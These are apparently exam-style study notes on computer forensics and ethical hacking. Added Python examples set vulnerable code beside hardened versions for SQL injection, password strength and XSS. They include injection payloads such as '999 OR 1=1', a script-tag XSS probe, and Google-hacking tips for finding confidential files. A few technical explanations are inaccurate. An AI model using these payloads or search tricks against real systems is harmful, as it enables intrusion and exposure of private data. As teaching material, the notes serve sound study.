f. Document the system date and time: If the system clock is one hour slow because of daylight-saving time, then file timestamps will also reflect the wrong time. To adjust for these inaccuracies, documenting the system date and time settings at the time the computer is taken into evidence is essential.
g. Make a list of key search words: It is all but impossible for a computer specialist to manually view and evaluate every file on a computer hard disk drive. Gathering information from individuals familiar with the case to help compile a list of relevant keywords is important. Such keywords can be used in the search of all computer hard disk drives and floppy diskettes using automated software.
h. Evaluate the Windows swap file: The Windows swap file is a potentially valuable source of evidence and leads. When the computer is turned off, the swap file is erased. But the content of the swap file can easily be captured and evaluated.
i. Evaluate file slack: It is a source of significant security leakage and consists of raw memory dumps that occur during the work session as files are closed. File slack should be evaluated for relevant keywords to supplement the keywords identified in the previous steps. File slack is typically a good source of Internet leads.
j. Evaluate unallocated space (erased files): Unallocated space should be evaluated for relevant keywords to supplement the keywords identified in the previous steps.
k. Search files, file slack, and unallocated space for keywords: The list of relevant keywords identified in the previous steps should be used to search all relevant computer hard disk drives and floppy diskettes. It is important to review the output of the text search utility, and equally important to document relevant findings.
l. Document file names, dates, and times: From an evidence standpoint, file names, creation dates, and last-modified dates and times can be relevant. The output should be in the form of a word-processing-compatible file that can be used to help document computer evidence issues tied to specific files.
m. Identify file, program, and storage anomalies: Encrypted, compressed, and graphic files store data in binary format. As a result, text data stored in these file formats cannot be identified by a text search program. Manual evaluation of these files is required and, in the case of encrypted files, much work may be involved.
n. Evaluate program functionality: Depending on the application software involved, running programs to learn their purpose may be necessary. When destructive processes that are tied to relevant evidence are discovered, this can be used to prove willfulness.
o. Document your findings: It is important to document your findings as issues are identified and as evidence is found. Documenting all of the software used in your forensic evaluation of the evidence, including the version numbers of the programs used, is also important.
p. Retain copies of software used: As part of your documentation process, it is recommended that a copy of the software used be included with the output of the forensic tool involved. Duplication of results can be difficult or impossible to achieve if the software has been upgraded and the original version used was not retained.
5. How do SANs (Storage Area Networks) play a role in computer forensics?
SANs are a relatively new methodology for attaching storage, whereby a separate network (separate from the traditional LAN) connects all storage and servers. This network would be a high-performance implementation, such as Fibre Channel, that encapsulates protocols such as the Small Computer System Interface (SCSI). These are more efficient at transferring data blocks from storage and have hardware implementations offering buffering and delivery guarantees. This is not available using TCP/IP.
SANs promise the ability to make any-to-any connections among multiple servers and storage devices. They can create a shared “pool” of storage that can be accessed by multiple servers through multiple paths, resulting in higher availability—especially during a network disaster recovery (NDR).
SANs also promise to simplify backup procedures. Tape subsystems could still be shared among numerous servers during backups—all transparent to the user. In other words, SANs allow distributed servers to access a large centralized storage subsystem for data-sharing applications during an NDR.
 SAN Benefits: A SAN provides a perfect environment for clustering that can extend to dozens of servers and storage devices—all the while having redundant links in a Fibre Channel fabric. Servers will continue to function because their data is still available through the SAN, even if storage devices fail during an NDR.
 Centralized management: When a disk or controller fails in a direct-attached environment, redundant systems keep the redundant array of independent (or inexpensive) disks (RAID) array operating normally and generate an alarm. However, the redundant component may fail as well, bringing the system down if the failed component isn't replaced quickly.
 Scalability: A storage area network can lower acquisition and expansion costs, in addition to lowering management costs. Even as new servers, disk arrays, and tape subsystems are added, the SAN architecture supports access between all servers and all storage resources in the network. Without disrupting data access, customers can add storage resources and even servers online.
 Reliability: A SAN is a network that resides between the host bus adapter and the storage device. This position inherently creates a critical point at the physical level, but by implementing multiple paths and redundant infrastructure devices, the SAN reduces or eliminates single points of failure.
 Performance: In application environments that depend on bulk data transfer (such as data warehousing and data-mining applications), maximum bandwidth is of particular interest. Backup and restore times can be shortened dramatically by the high channel speed and low latency obtained by using a SAN.
6. What is data recovery? Explain the role of backup in data recovery.
Data recovery is the process in which highly trained engineers evaluate and extract data from damaged media and return it in an intact format. Many people, even computer experts, fail to recognize data recovery as an option during a data crisis, yet it is possible to retrieve files that have been deleted and passwords that have been forgotten, or to recover entire hard drives that have been physically damaged.
The role of backup in data recovery
Many factors affect backup:
 Storage costs are decreasing: The cost per megabyte of primary (online) storage has fallen dramatically over the past several years and continues to do so as disk drive technologies advance.
 Systems have to be online continuously: Because systems must be continuously online, the dilemma becomes that you can no longer take files offline long enough to perform a backup.
 The role of backup has changed: The role of backup now includes the responsibility for recovering from user errors and ensuring that good data has been saved and can quickly be restored.
Conventional tape backup in today's market
 A typical tape management system consists of a dedicated workstation with the front end interfaced to the network and the back end controlling a repository of tape devices. The media server runs tape management software. It can administer backup devices throughout an enterprise and can run continuous parallel backups and restores.
 An alternative to tape backup is to physically replicate or mirror all data and keep two copies online at all times. Because the cost of primary storage is falling, this is not as cost-prohibitive as it once was. The advantage is that the data does not have to be restored, so there are no issues with immediate data availability.
 Network backup: Network backup creates network performance problems. Using the production network to carry backup data, as well as for normal user data access, can severely overburden today's busy network resources.
 Offline backup: Offline backup affects data accessibility. Host processors must be quiescent during the backup. Backup is not host-independent, nor is it nondisruptive to normal data access.
 Live backup: Live backups allow data access during the backup process but affect performance. Many database vendors offer live backup features. The downside to the live backup is that it puts a tremendous burden on the host.
 Mirroring: Mirroring doesn't protect against user error and replication of bad data. Fully replicated online data sounds great, albeit at twice the cost per megabyte of a single copy of online data.
New architectures and techniques are required
 Backup at extremely high speed, with host-processor independence from the underlying file structures supporting the data, is required. Recovery must be available at the file level. The time that systems are offline for backup must be eliminated.
 Remote hot recovery sites are needed for immediate resumption of data access. Backup of critical data is still required to ensure against data errors and user errors.
 To achieve effective backup and recovery, the decoupling of data from its storage space is needed.
 It is necessary to develop techniques to journal modified pages, so that journaling can be invoked within the primary storage device, without host intervention.
 Part of the primary storage area must be set aside for data to be backed up. This area must be as large as the largest backup block (file, logical volume, etc.).

7. Explain the working of digital evidence with an example.
Digital evidence is information stored or transmitted in binary form that may be relied on in court. It can be found on a computer hard drive or a mobile phone, among other places. Digital evidence is commonly associated with electronic crime, or e-crime, such as child pornography or credit card fraud. However, digital evidence is now used to prosecute all types of crimes, not just e-crime. For example, suspects' e-mail or mobile phone files might contain critical evidence regarding their intent, their whereabouts at the time of a crime and their relationship with other suspects. In 2005, for example, a floppy disk led investigators to the BTK serial killer, who had eluded police capture since 1974 and claimed the lives of at least 10 victims.
Ethical Hacking
Part A
1. What are the phases of a virus?
a. Dormant phase: At this stage the virus is idle. It gets activated by some action or event such as a date, a time, or the presence of another program.
b. Propagation phase: In this phase the virus generates copies of itself.
c. Triggering phase: This phase activates the virus to carry out the required function.
d. Execution phase: In this phase the virus performs its actual function, which may be harmless or destructive.

2. Explain SQL injection attacks.
SQL injection is an attack where the hacker makes use of unvalidated user input to enter arbitrary data or SQL commands; malicious queries are constructed and, when executed by the backend database, produce unwanted results. The attacker should have knowledge of the backend database and must make use of different strings to construct malicious queries to post them to the target.
For example:
SELECT item_name, item_description FROM item WHERE item_no = 999; (normal query)
SELECT item_name, item_description FROM item WHERE item_no = 999 OR 1=1; (injecting into an existing query)
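The item query above, as it is used in both this answer and Part B Q4(a), run two ways against a constructed in-memory SQLite table: built by string concatenation (the injectable form) and as a parameterized query. This is an added example, not code from the original notes; the table rows and column names are assumptions.

```python
"""Added example (not from the original notes): the item-lookup query from
Part A Q2 / Part B Q4(a), built by string concatenation versus a
parameterized query, run against a constructed in-memory SQLite table."""
import sqlite3

# Constructed sample data standing in for the notes' "item" table.
SAMPLE_ITEMS = [
    (999, "Widget", "Public item"),
    (1000, "Gadget", "Public item"),
    (1001, "Secret prototype", "Not for public listing"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE item (item_no INTEGER, item_name TEXT, item_description TEXT)"
    )
    conn.executemany("INSERT INTO item VALUES (?, ?, ?)", SAMPLE_ITEMS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, item_no: str) -> list:
    """The notes' 'normal query', built by pasting user input into the SQL text.
    Input '999 OR 1=1' turns the WHERE clause into a tautology and returns
    every row, which is exactly the injection the notes describe."""
    sql = (
        "SELECT item_name, item_description FROM item "
        "WHERE item_no = " + item_no
    )
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, item_no: str) -> list:
    """Hardened form: the input is validated and then travels as a bound
    parameter, never as SQL text, so 'OR 1=1' cannot become part of the
    query even if the validation were loosened."""
    if not item_no.strip().isdigit():
        raise ValueError("item_no must be a positive integer")
    sql = "SELECT item_name, item_description FROM item WHERE item_no = ?"
    return conn.execute(sql, (int(item_no),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("normal:  ", lookup_vulnerable(db, "999"))
    print("injected:", lookup_vulnerable(db, "999 OR 1=1"))  # all three rows
    print("safe:    ", lookup_safe(db, "999"))
    try:
        lookup_safe(db, "999 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```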
3. What is footprinting?
Footprinting is part of the reconnaissance process, used for gathering as much information as possible about a target computer system in a network. Footprinting can be both passive and active. Example: reviewing a company's website is passive footprinting, whereas attempting to gain access to sensitive information is active. During this phase the attacker can collect the following information:
 Domain name
 IP address
 Namespace

4. How does a DoS attack involve hacking?
A DoS attack is used to deny legitimate users access to a resource, such as a website, network, e-mail, etc., or to make it extremely slow. This type of attack is usually implemented by hitting the target resource, such as a web server, with too many parameters or requests at the same time. This results in the server failing to respond to all of the requests. The effect can be either crashing the server or slowing it down.

5. Write a short note on spoofing.
A spoofing attack happens when a malicious party successfully impersonates another user or device. Attackers typically use spoofing to gain unauthorized access to a system or to sensitive information. Spoofing attacks may also be used to launch attacks against other
network hosts or to spread malware. There are several major types of spoofing, including:
 IP address spoofing
 ARP spoofing
 DNS server spoofing
 Email spoofing

6. What is batch file programming?
Batch file programming is a way of making a computer do things simply by creating a batch file: you write the commands in a single Notepad file and execute them as a single file.
How to write a batch file
Step 1: Open your text editor. Batch file programming is really about writing commands. Notepad, WordPad, etc. are text editors.
Step 2: Begin writing code. The code is essentially the same as what you write in the command prompt. A few commands are as follows:
i. ipconfig: This presents network information such as the MAC address.
ii. start [website]: This opens the specified website in your browser.
iii. rem: This is used if you want to put comments or remarks in your code.
iv. pause: This pauses the script so that it can be read before it continues.
v. echo: This command displays text in the command prompt.
vi. %%a: This refers to every file in a given folder.
Part B
1. Explain Google hacking methods with examples.
Google hacking is a method of accessing information that is publicly available but not intended for public distribution. Using certain intelligent search techniques, one can land unexpected results on the Google search page. Google hacking involves using publicly available search engines to access publicly available information that almost certainly was not intended for public distribution.
The information accessed using Google hacking:
 Personal and financial information.
 User IDs, computer account logins, passwords.
 Private or proprietary company data.
 Sensitive government information.
 Flaws in websites and servers.
Common Google hacking techniques:
Search using file types, keywords, and site type: Many websites and organizations store their financial, personnel, etc. data in Microsoft Excel format. So, here is how you need to look for some sensitive information of a South African company. Don't forget to include keywords like Confidential, Budget, etc.
Use stock words and phrases: Along with file types like Excel, Word, or PowerPoint, you are also advised to use stock words and phrases like do not distribute, confidential, proprietary, not for distribution, e
Misconfigured web servers: Very often Google indexes directories that are not intended to be on the web. In Google hacking, these servers provide a rich set of information.
Numrange search: The NSA describes the numrange search as one of the "scariest searches available through Google". It uses two numbers separated by two dots and no spaces. A user can use it with search keywords and other search options.

2. Explain any four port scanning methods.
Ping scan: The simplest port scans are ping scans. A ping is an Internet Control Message Protocol (ICMP) echo request; you are looking for any ICMP replies, which indicate that the target is alive. A ping scan is an automated blast of many ICMP echo requests to different targets to see who responds. Administrators usually disable ping either on the firewall or on the router. It's quick and easy to turn off this functionality and make it impossible to scout the network this way. However, ping is a good troubleshooting tool, and turning it off makes tracking down network problems a little more difficult.
TCP connect: This port scanning technique is basically the same as the TCP half-open scan, but instead of leaving the target hanging, the port scanner completes the TCP connection. It's not as popular a technique as the TCP half-open scan. First, you have to send one more packet per scan, which increases the amount of noise you are
making on the network. Second, since you complete the connection with the target, you might trip an alarm that the half-open scan wouldn't.
UDP: UDP is the other half of our "hallway", and some standard services (DNS, SNMP, DHCP, for example) use UDP ports instead of TCP ports. When you run a UDP port scan, you send either an empty packet or a packet that has a different payload per port, depending on your use case.
SYN: Any SYN-ACK responses are possible connections; an RST (reset) response means the port is closed, but there is a live computer there. No response indicates the SYN is filtered on the network. Any SYN-ACK replies are a quick way for a cybercriminal to find the next potential target.

3. Discuss in detail any four DoS attack techniques.
a. Ping of death: The ping command is usually used to test the availability of a network resource. It works by sending small data packets to the network resource. The TCP/IP protocol allows 65,536 bytes as the maximum limit in the server. Since the data packets are larger than the server can handle, the server can freeze, reboot or crash.
b. Smurf attack: This type of attack uses a large amount of Internet Control Message Protocol (ICMP) ping traffic targeted at an Internet broadcast address. The reply IP address is spoofed to that of the intended victim. Since a single Internet broadcast address can support a maximum of 255 hosts, a Smurf attack amplifies a single ping 255 times. The effect of this is slowing down the network.
A Smurf attack is an attack in which a malicious user utilizes the broadcast address of a vulnerable network by sending spoofed packets, resulting in the flooding of the targeted IP address.
c. Buffer overflow: A buffer is a temporary storage location in RAM that is used to hold data so that the CPU can manipulate it before writing it back to the disk. Buffers have a size limit. This type of attack loads the buffer with more data than it can hold. This causes the buffer to overflow and corrupt the data it holds. Example: sending an e-mail with a file name that has 256 characters.
d. SYN attack: SYN is short for Synchronize. This type of attack takes advantage of the three-way handshake used to establish communication over TCP. A SYN attack works by flooding the victim with incomplete SYN messages. This causes the victim machine to allocate memory resources that are never used and to deny access to legitimate users.

4. Write down any four types of attacks.
a. SQL injection attack: SQL injection is an attack where the hacker makes use of unvalidated user input to enter arbitrary data or SQL commands; malicious queries are constructed and, when executed by the backend database, produce unwanted results. The attacker should have knowledge of the backend database and must make use of different strings to construct malicious queries to post them to the target.
For example:
SELECT item_name, item_description FROM item WHERE item_no = 999; (normal query)
SELECT item_name, item_description FROM item WHERE item_no = 999 OR 1=1; (injecting into an existing query)
The types of SQL injection attacks are as follows:
 Error-based SQL injection
 Union-based SQL injection
 Blind SQL injection
b. DoS attack (Denial of Service): A DoS attack is used to deny legitimate users access to a resource, such as a website, network, e-mail, etc., or to make it extremely slow. This type of attack is usually implemented by hitting the target resource, such as a web server, with too many parameters or requests at the same time. This results in the server failing to respond to all of the requests. The effect can be either crashing the server or slowing it down.
 Flooding attack
 Ping of death
 Smurf attack
 Buffer overflow
c. Sniffing: Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools. Sniffers are used by network/system administrators to monitor and troubleshoot network traffic.
Attackers use sniffers to capture data packets containing sensitive information such as passwords, account information, etc. Sniffers can be hardware or software installed in the system.
Types of sniffing:
 Active sniffing: This is the process of sniffing through a switch. A switch is a point-to-point network device. The switch regulates the flow of data between its ports by actively monitoring the MAC address on each.
 Passive sniffing: This is the process of sniffing through a hub. Any traffic that is passing through the non-switched or unbridged network segment can be seen by all the machines on the segment.
d. Password attack: One should always take care to have a strong password to defend one's accounts from potential hackers. A strong password has the following attributes:
 Contains at least 8 characters.
 A mix of letters, numbers and special characters.
 A combination of the following attributes:
i. Small and capital letters.
 Dictionary attack: In this attack, the attacker uses a predefined list of words from a dictionary and guesses the password. If the set password is weak, then a dictionary attack can decode it fast.
 Hybrid dictionary attack: It uses a set of dictionary words combined with extensions. Crunch is a word list generator where you can specify a standard character set.
 Brute force attack: In a brute force attack, the hacker uses all possible combinations of letters, numbers, special characters and small and capital letters to break the password.

5. Examine different forms of privacy attacks.
Here the attacker uses various automated tools which are freely available on the Internet. Some examples are as follows:
a. Trojan: A Trojan is a RAT (Remote Administration Tool) which enables the attacker to execute various software and hardware instructions on the target system. It has two parts:
i. Server part: It has to be installed on the victim's computer.
ii. Client part: It is installed on the attacker's system; this part gives complete control over the target computer.
b. Key logger: These are tools which enable the attacker to record all the keystrokes made by the victim and send the log secretly to an attacker mailbox which was previously set up by the attacker.
c. Spyware: A spyware utility is a malicious program that spies on the activities of the victim and passes the recorded information to the attacker without the victim's consent. Most spyware activities monitor and record the victim's Internet usage habits.
Typically a spyware tool is in a host .exe file or a utility file. If a victim downloads and executes an infected .exe file, then the spyware becomes active on the victim's system.
d. Sniffers: Sniffers were originally developed as a tool for debugging or troubleshooting network problems. An Ethernet-based sniffer works with a sniffer-based data card to capture and save the data packets sent across the network. A sniffer can turn out to be quite dangerous: if an attacker manages to install a sniffer on your system or on the router of the network, all the information, including passwords, company business, etc., will be lost.

6. Explain input validation attacks in detail.
An input validation attack is any malicious action against a computer system that involves manually entering strange information into a normal user input field. An input validation attack takes place when an attacker purposefully enters information into a system or application with the intention of breaking system functionality.
Types of input validation attack:
 Buffer overflow attack: It sends too much information for a system to process. The network or computer stops responding, and the attack can be used to access information by attacking memory. Example: stack overflow, format string overflow.
 Canonicalization: It takes place when someone changes a file directory path. This attack targets pages that use template files or reference alternate files on a web server. The basic form of this attack is to move
outside of the web document root in order to access system files. This type of functionality is accessed from the URL and is not limited to any one programming language or web server. Changing a file directory path, that is, the digital permission to access parts of a computer, in order to allow access to a malicious path is used to steal sensitive information or make unapproved changes.
 Cross-site scripting (XSS): This attack involves placing a malicious link in a proper place in a normal website; the link contains a valid URL with a dangerous script embedded. An unsuspecting visitor might trust the site they are on and have no idea that it contains malicious activity.

7. Analyze different DDoS attack types.
A Distributed Denial of Service (DDoS) attack is an attempt to make an online service or a website unavailable by overloading it with huge floods of traffic generated from multiple sources. DDoS attacks can be broadly categorized into three categories:
 Volume-based attacks
 Protocol attacks
 Application layer attacks
a. Volume-based attacks: Volume-based attacks include TCP floods, UDP floods, ICMP floods, and other spoofed-packet floods. These are also called Layer 3 & 4 attacks. Here, an attacker tries to saturate the bandwidth of the target site. The attack magnitude is measured in bits per second (bps).
i. UDP flood: A UDP flood is used to flood random ports on a remote host with numerous UDP packets, more specifically port
number 53. Specialized firewalls can be used to filter out or block malicious UDP packets.
ii. ICMP flood: This is similar to a UDP flood and is used to flood a remote host with numerous ICMP Echo Requests. This type of attack can consume both outgoing and incoming bandwidth, and a high volume of ping requests will result in overall system slowdown.
iii. HTTP flood: The attacker sends HTTP GET and POST requests to a targeted web server in a volume which cannot be handled by the server, leading to denial of additional connections from legitimate clients.
iv. Amplification attack: The attacker makes a request that generates a large response; this includes DNS requests for large TXT records and HTTP GET requests for large files like images, PDFs, or any other data files.
b. Protocol attacks: Protocol attacks include SYN floods, Ping of Death, fragmented-packet attacks, Smurf DDoS, etc. This type of attack consumes actual server resources and other resources like firewalls and load balancers. The attack magnitude is measured in packets per second.
i. DNS flood: DNS floods are used for attacking both the infrastructure and a DNS application to overwhelm a target system and consume all its available network bandwidth.
ii. SYN flood: The attacker sends TCP connection requests faster than the targeted machine can process them, causing network saturation. Administrators can tweak TCP stacks to mitigate the effect of SYN floods.
iii. Ping of death: The ping command is usually used to test the availability of a network resource. It works by sending small data packets to the network resource. The TCP/IP protocol allows 65,536 bytes as the maximum limit in the server. Since the data packets are larger than the server can handle, the server can freeze, reboot or crash.
c. Application layer attacks: Application layer attacks include Slowloris, zero-day DDoS attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities, and more. Here the goal is to crash the web server. The attack magnitude is measured in requests per second.
i. Application attack: This is also called a Layer 7 attack, where the attacker makes excessive log-in, database-lookup, or search requests to overload the application. It is really difficult to detect Layer 7 attacks because they resemble legitimate website traffic.
ii. NTP amplification: The attacker exploits publicly accessible Network Time Protocol (NTP) servers to overwhelm the targeted server with User Datagram Protocol (UDP) traffic.

8. How are 'crunch' and 'Hydra' related to ethical hacking?
Hydra has a very complex syntax for attacking web applications. So, let's just go and see the syntax first. This is the program which we use to launch the attack. Hydra comes pre-installed in all versions of Kali, so you don't need to do anything fancy. Just launch it from the command line by typing hydra.
Crunch is a wordlist generator where you can specify a standard character set or a custom character set. Crunch can generate all possible combinations and permutations. This tool comes bundled with the Kali distribution of Linux.

9. What is XSS?
Cross-site scripting (XSS): This attack involves placing a malicious link in a proper place in a normal website; the link contains a valid URL with a dangerous script embedded. An unsuspecting visitor might trust the site they are on and have no idea that it contains malicious activity. In other words, XSS enables attackers to inject client-side scripts into web pages by exploiting vulnerabilities in dynamically generated web pages. An attacker can execute malicious scripts (also commonly referred to as a malicious payload) in a legitimate website or web application and cause various damages, including data theft, session hijacking, redirecting the web page to another website, etc.
The goal of an XSS attack is always to execute malicious JavaScript in the victim's browser; there are a few fundamentally different ways of achieving that goal. XSS attacks are often divided into three types:
 Persistent XSS, where the malicious string originates from the website's database.
 Reflected XSS, where the malicious string originates from the victim's request.
 DOM-based XSS, where the vulnerability is in the client-side code rather than the server-side code.
 Reflected XSS: Here the attacker sends a script as input, and the attacker's content is reflected back to the victim. He can craft malicious scripts to get session cookies, redirect to a malicious web page, inject data, execute system commands and much more.
 Stored XSS: This attack can be considered riskier and it causes more damage. In this type of attack, the malicious code or script is saved on the web server (for example, in the database) and executed every time users call the appropriate functionality. This way a stored XSS attack can affect many users. Also, as the script is stored on the web server, it will affect the website for a longer time.
 DOM-based XSS: This type of attack occurs when the DOM environment is changed but the client-side code does not change. When the DOM environment is modified in the victim's browser, the client-side code executes differently.

10. Explain the methods of password hacking.
One should always take care to have a strong password to defend one's accounts from potential hackers. A strong password has the following attributes:
 Contains at least 8 characters.
 A mix of letters, numbers and special characters.
 A combination of the following attributes:
I. Small and capital letters.
 Dictionary attack: In this attack, the attacker uses a predefined list of words from a dictionary and guesses the password. If the set password is weak, then a dictionary attack can decode it fast.
 Hybrid dictionary attack: It uses a set of dictionary words combined with extensions. Crunch is a word list generator where you can specify a standard character set. Crunch can generate all possible combinations and permutations of words.
 Brute force attack: In a brute force attack, the hacker uses all possible combinations of letters, numbers, special characters and small and capital letters to break the password. This type of attack has a high probability of success, but it requires an enormous amount of time to process all the combinations.
 Phishing attack: There's an easy way to hack: ask the user for his or her password. A phishing email leads the unsuspecting reader to a faked log-in page associated with whatever service the hacker wants to access, requesting the user to put right some terrible problem with their security. That page then skims their password, and the hacker can go and use it for their own purposes.
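A password-policy check built from the attributes listed in Q10, which also flags the passwords the dictionary and hybrid dictionary attacks described there would reach first. This is an added example, not code from the original notes; the mini wordlist and the extension limit are constructed assumptions.

```python
"""Added example (not from the original notes): a password-policy check that
enforces the attributes listed in Part B Q10 and additionally rejects the
passwords a dictionary or hybrid dictionary attack would reach first. The
wordlist and the extension limit are constructed for this example."""
import string
from typing import Optional

# Constructed mini wordlist standing in for a real dictionary file.
WORDLIST = sorted({"password", "welcome", "summer", "admin", "letmein"})
# Hybrid attacks append or prepend short extensions (digits, years, symbols)
# to dictionary words; treat anything within this many characters of a word
# as reachable by such an attack. The limit is an assumption for this example.
MAX_EXTENSION = 4


def policy_failures(pw: str) -> list:
    """Return the attributes from the notes that pw fails (empty list = pass)."""
    fails = []
    if len(pw) < 8:
        fails.append("fewer than 8 characters")
    if not any(c.isalpha() for c in pw):
        fails.append("no letters")
    if not any(c.isdigit() for c in pw):
        fails.append("no numbers")
    if not any(c in string.punctuation for c in pw):
        fails.append("no special characters")
    if not (any(c.islower() for c in pw) and any(c.isupper() for c in pw)):
        fails.append("no mix of small and capital letters")
    return fails


def hybrid_dictionary_match(pw: str) -> Optional[str]:
    """Return the dictionary word a hybrid attack would extend to reach pw
    (case-insensitive, word at the start or end, extension of at most
    MAX_EXTENSION characters), or None if no word applies."""
    low = pw.lower()
    for word in WORDLIST:
        if 0 <= len(low) - len(word) <= MAX_EXTENSION:
            if low.startswith(word) or low.endswith(word):
                return word
    return None


def brute_force_keyspace(pw: str) -> int:
    """Number of candidates a brute-force attack must cover for a password of
    this length drawn from the character classes pw actually uses."""
    charset = 0
    if any(c.islower() for c in pw):
        charset += 26
    if any(c.isupper() for c in pw):
        charset += 26
    if any(c.isdigit() for c in pw):
        charset += 10
    if any(c in string.punctuation for c in pw):
        charset += len(string.punctuation)  # 32 ASCII symbols
    return charset ** len(pw)


def check_password(pw: str) -> dict:
    """Combine the three checks into one verdict: a password that meets every
    listed attribute can still fail because it is a dictionary word plus a
    short extension, which a hybrid attack tries long before brute force."""
    fails = policy_failures(pw)
    word = hybrid_dictionary_match(pw)
    if word is not None:
        fails.append(f"dictionary word '{word}' plus a short extension")
    return {"ok": not fails, "failures": fails,
            "keyspace": brute_force_keyspace(pw)}


if __name__ == "__main__":
    # Constructed candidates: too short, policy-compliant but hybrid-guessable,
    # and one that passes every check.
    for candidate in ("pass", "Welcome123!", "rV7#kq9Lw2"):
        print(candidate, check_password(candidate))
```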
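For the reflected and stored XSS cases described in Q9 above, a search-results page that echoes the user's query back, rendered once without and once with output escaping, plus a stored-comment path showing that escaping at output time protects later visitors too. This is an added example, not code from the original notes; the page template, the comment store and the sample input are constructed.

```python
"""Added example (not from the original notes): reflected and stored XSS from
Part B Q9, shown as a page that echoes user input, in a vulnerable and a
hardened form. Template, comment store and sample input are constructed."""
import html
import re

# Constructed page template: the search term is reflected into the body.
TEMPLATE = "<html><body><p>Results for: {term}</p></body></html>"

# Constructed input of the kind the notes describe: a script tag where plain
# search text is expected. A harmless alert is used as the marker.
SAMPLE_QUERY = "<script>alert('xss')</script>"

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_vulnerable(term: str) -> str:
    """Reflected XSS: the raw term is pasted into the HTML, so a <script> tag in
    the request is sent back to the victim's browser as real markup."""
    return TEMPLATE.format(term=term)


def render_safe(term: str) -> str:
    """Hardened form: html.escape() turns <, >, &, " and ' into entities, so the
    term is displayed as text and can no longer open a tag. (Escaping is
    context-specific: this is correct for HTML body text, not for a script
    block or a URL.)"""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def contains_active_script(page: str) -> bool:
    """Check a test or reviewer can run over rendered output: is there a live
    <script> opening tag in the page? The template itself carries none."""
    return bool(SCRIPT_TAG.search(page))


# Constructed stand-in for the server-side store used by stored XSS.
COMMENTS = []


def post_comment(text: str) -> None:
    """Stored XSS path: the text is saved as-is, like the notes' script that is
    'saved on the web server (for example, in the database)'."""
    COMMENTS.append(text)


def render_comments_safe() -> str:
    """Escaping happens at output time, so a payload stored earlier is
    neutralized for every later visitor as well."""
    return "<ul>" + "".join(
        f"<li>{html.escape(c, quote=True)}</li>" for c in COMMENTS
    ) + "</ul>"


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_QUERY))  # script tag reaches the browser
    print(render_safe(SAMPLE_QUERY))        # shown as &lt;script&gt;... text
    post_comment(SAMPLE_QUERY)
    print(render_comments_safe())
```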